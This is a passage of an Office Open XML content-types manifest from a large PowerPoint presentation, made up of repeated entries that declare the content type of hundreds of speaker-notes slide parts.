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83.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide672.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide397.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide575.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide680.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide761.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide591.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide486.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide656.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide494.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide559.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide745.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide753.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide567.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide389.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide478.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide664.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide407.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737.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601.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648.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide71.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide729.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide415.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide558.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide647.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide736.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide663.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide592.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide574.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide760.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide388.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide408.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide495.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide681.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide584.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide77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56.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide754.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide479.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide503.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide485.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide657.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide42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139.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352.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide49.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide299.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide568.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide102.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide610.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide743.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide719.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide239.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide700.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide100.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide646.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide593.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide603.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide638.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide409.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide417.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide263.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide658.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide166.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide771.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide674.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide522.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide57.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide565.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30.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60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665.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671.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide379.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide789.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide573.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide746.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide530.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide701.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide523.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide752.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide566.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide159.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide639.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide673.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide487.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide337.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide718.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide744.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide594.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide343.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide645.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide738.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide165.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide602.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide386.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58.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide772.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide30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200.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide350.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide739.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66.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572.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751.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide158.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540.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613.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710.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide699.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide796.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide725.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide628.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide644.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide741.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98.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide516.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide595.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide4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59.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757.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide385.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide571.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide539.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide780.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide114.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide35.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide652.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide667.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide323.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide684.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556.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide242.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide586.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76.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide442.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide256.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide541.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide629.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide726.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52.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide152.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797.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide61.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide167.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide711.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide314.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide614.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742.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45.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide685.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide596.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide570.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide758.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668.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide580.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide653.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide395.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide670.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585.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide781.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide525.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide800.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide611.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557.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide283.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727.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide73.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide755.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide182.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide71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581.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide468.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798.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide227.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626.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669.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide78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597.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide554.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569.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682.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide65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697.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655.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide698.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide728.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide126.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612.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide497.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide327.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799.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide31.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide582.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154.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide454.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide627.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide411.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713.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide756.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740.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide783.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide683.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555.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide211.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide598.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide254.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide19.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide640.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400.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768.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide390.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide687.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide196.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide784.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide293.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide552.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74.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide803.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide714.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide609.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide528.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide633.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide358.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide616.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide695.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide447.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide722.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide439.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide705.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide462.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide793.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide776.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide95.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624.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641.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide285.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide543.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide560.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide268.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide599.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70.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide195.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide535.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide769.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide373.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632.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785.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide294.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide642.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide553.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715.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide278.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide775.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide792.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide589.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide608.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide536.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide519.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide625.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide696.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide284.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide267.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide704.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide542.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721.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide207.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679.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689.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550.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220.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide631.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615.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide135.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide786.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123.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588.xml"/>
